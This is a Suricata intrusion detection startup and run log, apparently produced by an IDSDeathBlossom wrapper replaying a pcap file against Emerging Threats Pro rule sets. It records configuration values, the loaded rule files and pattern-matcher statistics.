23/9/2019 -- 11:16:40 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32916 and 'response-body-inspect-window' set to 16755 after randomization.
23/9/2019 -- 11:16:40 - <Config> - DNS request flood protection level: 500
23/9/2019 -- 11:16:40 - <Config> - DNS per flow memcap (state-memcap): 524288
23/9/2019 -- 11:16:40 - <Config> - DNS global memcap: 16777216
23/9/2019 -- 11:16:40 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
23/9/2019 -- 11:16:40 - <Config> - preallocated 1000 hosts of size 136
23/9/2019 -- 11:16:40 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
23/9/2019 -- 11:16:40 - <Config> - using magic-file /usr/share/file/magic
23/9/2019 -- 11:16:40 - <Config> - Core dump size is unlimited.
23/9/2019 -- 11:16:40 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
23/9/2019 -- 11:16:40 - <Config> - preallocated 1000 defrag trackers of size 168
23/9/2019 -- 11:16:40 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
23/9/2019 -- 11:16:40 - <Config> - stream "prealloc-sessions": 2048 (per thread)
23/9/2019 -- 11:16:40 - <Config> - stream "memcap": 33554432
23/9/2019 -- 11:16:40 - <Config> - stream "midstream" session pickups: disabled
23/9/2019 -- 11:16:40 - <Config> - stream "async-oneside": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "checksum-validation": disabled
23/9/2019 -- 11:16:40 - <Config> - stream."inline": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "bypass": disabled
23/9/2019 -- 11:16:40 - <Config> - stream "max-synack-queued": 5
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "memcap": 134217728
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "depth": 0
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "toserver-chunk-size": 2682
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "toclient-chunk-size": 2522
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly.raw: enabled
23/9/2019 -- 11:16:40 - <Config> - stream.reassembly "segment-prealloc": 2048
23/9/2019 -- 11:16:40 - <Config> - Delayed detect disabled
23/9/2019 -- 11:16:40 - <Config> - pattern matchers: MPM: ac, SPM: bm
23/9/2019 -- 11:16:40 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
23/9/2019 -- 11:16:40 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
23/9/2019 -- 11:16:40 - <Config> - prefilter engines: MPM
23/9/2019 -- 11:16:40 - <Config> - IP reputation disabled
23/9/2019 -- 11:16:40 - <Perf> - Registered 148 keyword profiling counters.
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
23/9/2019 -- 11:16:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
23/9/2019 -- 11:16:45 - <Config> - No rules loaded from ET-icmp.rules.
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
23/9/2019 -- 11:16:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
23/9/2019 -- 11:16:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
23/9/2019 -- 11:16:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
23/9/2019 -- 11:16:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
23/9/2019 -- 11:16:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
23/9/2019 -- 11:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
23/9/2019 -- 11:16:53 - <Config> - No rules loaded from local.rules.
23/9/2019 -- 11:16:53 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
23/9/2019 -- 11:16:53 - <Info> - Threshold config parsed: 0 rule(s) found
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tcp-packet
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tcp-stream
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for udp-packet
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for other-ip
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_uri
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_request_line
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_client_body
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_response_line
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header_names
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header_names
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept_enc
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept_lang
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_referer
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_connection
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_len
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_len
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_type
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_type
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_start
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_start
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_method
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_cookie
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_cookie
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_uri
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_user_agent
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_host
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_host
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_stat_msg
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_stat_code
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dns_query
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_sni
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_issuer
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_subject
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_serial
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dce_stub_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dce_stub_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_software
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_software
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for file_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for file_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_request_line
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_response_line
23/9/2019 -- 11:16:54 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
23/9/2019 -- 11:16:54 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
23/9/2019 -- 11:16:54 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
23/9/2019 -- 11:16:54 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
23/9/2019 -- 11:16:54 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
23/9/2019 -- 11:16:54 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
23/9/2019 -- 11:16:54 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
23/9/2019 -- 11:16:54 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
23/9/2019 -- 11:17:00 - <Perf> - Unique rule groups: 104
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver TCP packet": 35
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient TCP packet": 17
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver TCP stream": 33
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient TCP stream": 19
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver UDP packet": 27
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient UDP packet": 17
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "other IP packet": 3
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_uri": 14
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_request_line": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_client_body": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_response_line": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_header": 10
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_header": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_header_names": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_accept": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_referer": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_content_len": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_content_type": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_content_type": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_protocol": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_start": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_method": 5
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_cookie": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_cookie": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_host": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver dns_query": 4
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver tls_sni": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver file_data": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient file_data": 7
23/9/2019 -- 11:17:02 - <Perf> - Registered 39590 rule profiling counters.
23/9/2019 -- 11:17:02 - <Info> - fast output device (regular) initialized: alert
23/9/2019 -- 11:17:02 - <Info> - eve-log output device (regular) initialized: eve.json
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'alert'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'http'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'dns'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'tls'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'files'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'ssh'
23/9/2019 -- 11:17:02 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
23/9/2019 -- 11:17:02 - <Info> - stats output device (regular) initialized: stats.log
23/9/2019 -- 11:17:02 - <Config> - AutoFP mode using "Hash" flow load balancer
23/9/2019 -- 11:17:02 - <Info> - reading pcap file /var/pcap/09232019.1116-pcap_6.pcap
23/9/2019 -- 11:17:02 - <Config> - using 1 flow manager threads
23/9/2019 -- 11:17:02 - <Config> 

2019-09-23 11:16:39,248 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-09-23 11:16:40,051 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-09-23 11:16:40,052 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-09-23 11:16:40,052 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-09-23 11:16:40,052 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-09-23 11:16:40,052 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/e50b5b64c5f3331deb0fb67bc7c285a556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09232019.1116-pcap_6.pcap -vvv -k none
2019-09-23 11:17:10,378 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-09-23 11:17:10,379 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 31.1397080421